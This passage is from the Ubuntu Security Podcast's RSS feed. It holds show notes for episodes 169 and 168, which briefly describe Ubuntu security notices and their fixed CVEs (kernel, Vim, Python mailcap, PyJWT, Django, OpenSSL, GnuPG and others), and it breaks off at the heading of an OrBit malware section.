<h3 id="usn-5518-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5518-1">USN-5518-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33981">CVE-2022-33981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1975">CVE-2022-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1974">CVE-2022-1974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1789">CVE-2022-1789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0500">CVE-2022-0500</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 GA + clouds, devices, lowlatency etc</li>
</ul>
<h3 id="usn-5516-1-vim-vulnerabilities-04-18">[<a href="https://ubuntu.com/security/notices/USN-5516-1">USN-5516-1</a>] Vim vulnerabilities [04:18]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2210">CVE-2022-2210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2207">CVE-2022-2207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2000">CVE-2022-2000</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>vim is definitely fast becoming one of our most updated packages -
particularly in 16.04 ESM</li>
<li>More bugs found via fuzzing - shows what having a bug bounty can do to
shine a light on possible vulnerabilities (or does it just attract
shallow bug hunters&hellip;) - it&rsquo;s hard to say for certain how much of a
security impact these different vulnerabilities have</li>
<li>OOB write + 2 heap buffer overflows - all classified as high priority on
the bounty platform ($95 reward apparently for each)</li>
</ul>
<h3 id="usn-5520-1-usn-5520-2-http-daemon-vulnerability-05-18">[<a href="https://ubuntu.com/security/notices/USN-5520-1">USN-5520-1</a>, <a href="https://ubuntu.com/security/notices/USN-5520-2">USN-5520-2</a>] HTTP-Daemon vulnerability [05:18]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31081">CVE-2022-31081</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Perl library implementing a simple HTTP server - not often used in
production (since would then use nginx or apache)</li>
<li>Request smuggling vuln through a crafted Content-Length parameter - could
then allow requests that would otherwise be rejected</li>
</ul>
<h3 id="usn-5519-1-python-vulnerability-05-54">[<a href="https://ubuntu.com/security/notices/USN-5519-1">USN-5519-1</a>] Python vulnerability [05:54]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-20107">CVE-2015-20107</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Oldest vuln patched this week - fix and CVE were disclosed back in April
this year but the bug was first reported back in 2015 - at that time
there was disagreement between the reporter and the upstream developers
as to whether this was a real vuln or not - this is a bug in handling of
mailcap entries - and mailcap is designed to execute arbitrary commands -
but those defined by the user - whereas in this case, if it was used to
launch a command on a crafted filename, the filename itself could specify
the command to be executed, not what the user had thought that they had
configured via their mailcap entry</li>
<li>Fixed to appropriately quote the arguments</li>
</ul>
<h3 id="usn-5522-1-webkitgtk-vulnerabilities-07-19">[<a href="https://ubuntu.com/security/notices/USN-5522-1">USN-5522-1</a>] WebKitGTK vulnerabilities [07:19]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26710">CVE-2022-26710</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22677">CVE-2022-22677</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Speaking of one of the most updated packages ;)</li>
<li>WebKitGTK sees regular upstream security releases (similar to Firefox)
and we publish these as they are released</li>
<li>UAF via crafted malcious web content -&gt; RCE</li>
</ul>
<h3 id="usn-5523-1-libtiff-vulnerabilities-08-02">[<a href="https://ubuntu.com/security/notices/USN-5523-1">USN-5523-1</a>] LibTIFF vulnerabilities [08:02]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22844">CVE-2022-22844</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19144">CVE-2020-19144</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19131">CVE-2020-19131</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0924">CVE-2022-0924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0909">CVE-2022-0909</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0908">CVE-2022-0908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0907">CVE-2022-0907</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref, div by zero -&gt; DoS</li>
<li>various OOB reads -&gt; info leak / DoS</li>
</ul>
<h3 id="usn-5524-1-harfbuzz-vulnerability-08-37">[<a href="https://ubuntu.com/security/notices/USN-5524-1">USN-5524-1</a>] HarfBuzz vulnerability [08:37]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33068">CVE-2022-33068</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow discovered via in-built fuzzer within HarrBuzz combined
with running HB with <a href="https://clang.llvm.org/docs/UndefinedBehaviorSanitizer.html">UBSan</a> to detect memory corruption</li>
<li>Likely heap buffer overflow -&gt; RCE / crash</li>
</ul>
<h3 id="usn-5526-1-pyjwt-vulnerability-08-58">[<a href="https://ubuntu.com/security/notices/USN-5526-1">USN-5526-1</a>] PyJWT vulnerability [08:58]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29217">CVE-2022-29217</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>JSON web token implementation in python</li>
<li>Supports using various crypto algorithms for signing / validation including SSH public keys etc</li>
<li>Turns out an attacker could &ldquo;sign&rdquo; a JWT with the public half of an SSH
key pair as the key for one of the HMAC algorithms - as far as an API
user of PyJWT would see, the token would then validate the same as if it
had been actually signed by the private key of the same SSH public key
pair</li>
<li>Fixed to disallow the use of SSH public keys as inputs for signing keys</li>
</ul>
<h3 id="usn-5527-1-checkmk-vulnerabilities-09-43">[<a href="https://ubuntu.com/security/notices/USN-5527-1">USN-5527-1</a>] Checkmk vulnerabilities [09:43]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24565">CVE-2022-24565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40906">CVE-2021-40906</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36563">CVE-2021-36563</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9781">CVE-2017-9781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14955">CVE-2017-14955</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>system monitoring system / framework</li>
<li>various XSS vulns in web console, ability to read sensitive info from GUI
crash report</li>
</ul>
<h3 id="usn-5525-1-apache-xml-security-for-java-vulnerability-09-56">[<a href="https://ubuntu.com/security/notices/USN-5525-1">USN-5525-1</a>] Apache XML Security for Java vulnerability [09:56]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40690">CVE-2021-40690</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Vuln in handling of crafted XPath transform, where an attacker could read
arbitrary local XML files</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="22-dot-10-mid-cycle-product-roadmap-sprint-10-13">22.10 mid-cycle product roadmap sprint [10:13]</h3>
<ul>
<li>This week is the 22.10 mid-cycle product roadmap sprint at Canonical</li>
<li>Engineering teams at Canonical work on a 6-month development cycle,
in-line with the Ubuntu release cycle - even though not all teams work on
Ubuntu</li>
<li>Each 6 month cycle consists of 3 week-long sprint sessions - 2 product
roadmap sprints, and 1 engineering sprint</li>
<li>At the start of each cycle there is an initial product roadmap sprint to
review the progress / achievements etc of the previous 6 month
development cycle and set the goals for the coming development cycle.</li>
<li>At the approximate mid-point of that new development cycle, 3 months
later, there is the mid-cycle product roadmap sprint to review progress
etc along the way</li>
<li>Generally consists of managers and senior technical team members from
each team presenting on their progress etc and reviews it with the other
teams, plus there many cross-team meetings etc</li>
<li>Traditionally these were in-person events but with COVID etc they all
moved to being virtual - this year has seen the resumption of in-person
sprints for the start-of-roadmap sprints but the mid-cycle ones are still
virtual</li>
<li>As far as the security team is concerned, we talked over various topics
like progress on FIPS certification for 22.04 LTS, as well as various
AppArmor enhancements, as well as customer specific work-items and
general progress on maintenence tasks like CVE patching, MIR security
reviews and more.</li>
<li>Next roadmap sprint will be at the end of October to review how this
cycle went <strong>and</strong> to set the goals for 23.04 cycle - this will also be
followed by an engineering sprint, where all members of the engineering
sprint get together for a week <strong>in-person</strong> to collaborate and hack on
whatever their team needs</li>
<li>That will then also be followed by a new revived <a href="https://www.omgubuntu.co.uk/2022/04/ubuntu-summit-returns-in-autumn-2022">Ubuntu Summit</a> (modeled
somewhat like the old Ubuntu Developer Summits) - a chance for folks from
the community to gather in person alongside folks from Canonical to
discuss and drive forwards various features for Ubuntu and the like.</li>
<li>Exciting times ahead!</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E169.mp3" length="13448602" type="audio/mpeg" /><itunes:duration>890</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 168
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-168/</link>
          <pubDate>Fri, 15 Jul 2022 15:33:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>6c8fc8b515f4f3718da0aa01d11dd88f366766729b52c20473c9819f873cbd2d1fce7db6d7c5693e476f001669202b2919d09f1beab3d78d10edda7c4cf2c029</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 168</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we rocket back into your podcast feed with a look at the OrBit
  Linux malware teardown from Intezer, plus we cover security updates for
  cloud-init, Vim, the Linux kernel, GnuPG, Dovecot and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we rocket back into your podcast feed with a look at the OrBit
  Linux malware teardown from Intezer, plus we cover security updates for
  cloud-init, Vim, the Linux kernel, GnuPG, Dovecot and more.
  </itunes:summary>
        <description>  This week we rocket back into your podcast feed with a look at the OrBit
  Linux malware teardown from Intezer, plus we cover security updates for
  cloud-init, Vim, the Linux kernel, GnuPG, Dovecot and more.
  </description>
        <googleplay:description>  This week we rocket back into your podcast feed with a look at the OrBit
  Linux malware teardown from Intezer, plus we cover security updates for
  cloud-init, Vim, the Linux kernel, GnuPG, Dovecot and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we rocket back into your podcast feed with a look at the OrBit
Linux malware teardown from Intezer, plus we cover security updates for
cloud-init, Vim, the Linux kernel, GnuPG, Dovecot and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>52 unique CVEs addressed</p>
<h3 id="usn-5496-1-cloud-init-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5496-1">USN-5496-1</a>] cloud-init vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2084">CVE-2022-2084</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><code>cloud-init</code> was originally a Canonical developed project but is now widely
used by many of the public clouds for configuring cloud images on first
boot</li>
<li>When validating configuration, would log invalid entries - if one of
those was a password then the password would get logged in the clear -
and cloud init logs are world readable by default</li>
<li>Fixed to instead log a generic error message with details on how to
obtain the actual invalid entries via a privileged command</li>
</ul>
<h3 id="usn-5497-1-libjpeg6b-vulnerabilities-01-54">[<a href="https://ubuntu.com/security/notices/USN-5497-1">USN-5497-1</a>] Libjpeg6b vulnerabilities [01:54]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11214">CVE-2018-11214</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11213">CVE-2018-11213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14152">CVE-2020-14152</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11813">CVE-2018-11813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11212">CVE-2018-11212</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various DoS via crafted JPEG,PPM or Targa image files</li>
<li>OOB read, excessive memory consumption etc</li>
</ul>
<h3 id="usn-5498-1-vim-vulnerabilities-02-16">[<a href="https://ubuntu.com/security/notices/USN-5498-1">USN-5498-1</a>] Vim vulnerabilities [02:16]</h3>
<ul>
<li>8 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1898">CVE-2022-1898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1851">CVE-2022-1851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1796">CVE-2022-1796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1785">CVE-2022-1785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1735">CVE-2022-1735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1733">CVE-2022-1733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1629">CVE-2022-1629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0413">CVE-2022-0413</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>vim is fast becoming one of our most updated packages for security vulns</li>
<li>More instances of DoS or possible RCE attacks via crafted input files
found via fuzzing</li>
</ul>
<h3 id="usn-5499-1-curl-vulnerabilities-02-44">[<a href="https://ubuntu.com/security/notices/USN-5499-1">USN-5499-1</a>] curl vulnerabilities [02:44]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32208">CVE-2022-32208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27781">CVE-2022-27781</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-166/">Episode 166</a></li>
</ul>
<h3 id="usn-5485-2-linux-kernel--oem--vulnerabilities-02-53">[<a href="https://ubuntu.com/security/notices/USN-5485-2">USN-5485-2</a>] Linux kernel (OEM) vulnerabilities [02:53]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21125">CVE-2022-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.14 OEM kernel</li>
<li>MMIO stale data vulns (<a href="https://ubuntusecuritypodcast.org/episode-165/">Episode 165</a>)</li>
</ul>
<h3 id="usn-5493-2-linux-kernel--hwe--vulnerability-03-03">[<a href="https://ubuntu.com/security/notices/USN-5493-2">USN-5493-2</a>] Linux kernel (HWE) vulnerability [03:03]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS),
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 and 5.13 HWE kernels respectively</li>
<li>8 Devices USB2CAN driver -&gt; double free -&gt; crash (DoS)</li>
</ul>
<h3 id="usn-5500-1-linux-kernel-vulnerabilities-03-21">[<a href="https://ubuntu.com/security/notices/USN-5500-1">USN-5500-1</a>] Linux kernel vulnerabilities [03:21]</h3>
<ul>
<li>8 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28356">CVE-2022-28356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1419">CVE-2022-1419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1353">CVE-2022-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4202">CVE-2021-4202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 GA + AWS</li>
<li>Usual mix of issues in various drivers -&gt; UAFs due to various race
conditions, information leak (uninitialised memory) etc -&gt; DoS or
possible code execution</li>
</ul>
<h3 id="usn-5501-1-django-vulnerability-03-47">[<a href="https://ubuntu.com/security/notices/USN-5501-1">USN-5501-1</a>] Django vulnerability [03:47]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34265">CVE-2022-34265</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible SQL injection if used the <code>Trunc()</code> or <code>Extract()</code> DB functions with
untrusted data</li>
</ul>
<h3 id="usn-5479-2-php-vulnerabilities-04-05">[<a href="https://ubuntu.com/security/notices/USN-5479-2">USN-5479-2</a>] PHP vulnerabilities [04:05]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31626">CVE-2022-31626</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31625">CVE-2022-31625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-164/">Episode 164</a></li>
</ul>
<h3 id="usn-5479-3-php-regression">[<a href="https://ubuntu.com/security/notices/USN-5479-3">USN-5479-3</a>] PHP regression</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31626">CVE-2022-31626</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31625">CVE-2022-31625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5502-1-openssl-vulnerability-04-21">[<a href="https://ubuntu.com/security/notices/USN-5502-1">USN-5502-1</a>] OpenSSL vulnerability [04:21]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2097">CVE-2022-2097</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandled AES OCB (offset cookbook) mode - combines authentication with
encryption - on 32-bit x86 platforms that support AES-NI hardware
optimised instructions - would possibly miss one block of data and leave
it unencrypted</li>
</ul>
<h3 id="usn-5503-1-usn-5503-2-gnupg-vulnerability-05-11">[<a href="https://ubuntu.com/security/notices/USN-5503-1">USN-5503-1</a>, <a href="https://ubuntu.com/security/notices/USN-5503-2">USN-5503-2</a>] GnuPG vulnerability [05:11]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34903">CVE-2022-34903</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible to craft signed data such that on attempted verification GPG
would display output that appeared to show the message was correctly
signed when infact it would fail - so could possibly trick user /
application</li>
</ul>
<h3 id="usn-5488-2-openssl-vulnerability-05-37">[<a href="https://ubuntu.com/security/notices/USN-5488-2">USN-5488-2</a>] OpenSSL vulnerability [05:37]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2068">CVE-2022-2068</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-165/">Episode 165</a></li>
</ul>
<h3 id="usn-5505-1-linux-kernel-vulnerabilities-05-46">[<a href="https://ubuntu.com/security/notices/USN-5505-1">USN-5505-1</a>] Linux kernel vulnerabilities [05:46]</h3>
<ul>
<li>19 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28356">CVE-2022-28356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24958">CVE-2022-24958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21166">CVE-2022-21166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21125">CVE-2022-21125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21123">CVE-2022-21123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1734">CVE-2022-1734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1679">CVE-2022-1679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1652">CVE-2022-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1419">CVE-2022-1419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1353">CVE-2022-1353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0330">CVE-2022-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4202">CVE-2021-4202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39714">CVE-2021-39714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39685">CVE-2021-39685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3752">CVE-2021-3752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 - 16.04 ESM kvm kernel + 14.04 ESM HWE kernel</li>
<li>MMIO stale data plus various other kernel issues that have been covered
in recent episodes</li>
</ul>
<h3 id="usn-5506-1-nss-vulnerabilities-06-24">[<a href="https://ubuntu.com/security/notices/USN-5506-1">USN-5506-1</a>] NSS vulnerabilities [06:24]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-34480">CVE-2022-34480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22747">CVE-2022-22747</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crash on empty pkcs7 sequence -&gt; DoS</li>
<li>Possible free of invalid pointer -&gt; likely crash -&gt; DoS or possible RCE</li>
</ul>
<h3 id="usn-5507-1-vim-vulnerabilities-06-48">[<a href="https://ubuntu.com/security/notices/USN-5507-1">USN-5507-1</a>] Vim vulnerabilities [06:48]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1942">CVE-2022-1942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1897">CVE-2022-1897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1968">CVE-2022-1968</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Moar vim CVEs</li>
</ul>
<h3 id="usn-5509-1-dovecot-vulnerability-06-57">[<a href="https://ubuntu.com/security/notices/USN-5509-1">USN-5509-1</a>] Dovecot vulnerability [06:57]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-30550">CVE-2022-30550</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible privilege escalation when using similar primary and non-primary
passdb configuration entries - unlikely configuration to use in practice
but could then result in the non-primary config allowing users to access
as the primary config</li>
</ul>
<h3 id="usn-5508-1-python-ldap-vulnerability-07-30">[<a href="https://ubuntu.com/security/notices/USN-5508-1">USN-5508-1</a>] Python LDAP vulnerability [07:30]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46823">CVE-2021-46823</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS when using <code>ldap.schema</code> to validate untrusted schemas - DoS via
excessive CPU/memory usage</li>
</ul>
<h3 id="usn-5510-1-usn-5510-2-x-dot-org-x-server-vulnerabilities-07-51">[<a href="https://ubuntu.com/security/notices/USN-5510-1">USN-5510-1</a>, <a href="https://ubuntu.com/security/notices/USN-5510-2">USN-5510-2</a>] X.Org X Server vulnerabilities [07:51]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM),  Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2320">CVE-2022-2320</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2319">CVE-2022-2319</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different OOB reads via various X server methods - untrusted client
could use this to crash X server or expose sensitive info</li>
</ul>
<h3 id="usn-5256-1-uriparser-vulnerabilities-08-07">[<a href="https://ubuntu.com/security/notices/USN-5256-1">USN-5256-1</a>] uriparser vulnerabilities [08:07]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46142">CVE-2021-46142</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46141">CVE-2021-46141</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>C library for parsing RFC 3986 compliant URIs</li>
<li>Not surprisingly, since C is memory unsafe, contained 2 different issue
with invalid memory management which could be triggered via crafted input
-&gt; both resulting in UAF -&gt; DoS / RCE</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="orbit-malware-analysis-08-44">OrBit malware analysis [08:44]</h3>
<ul>
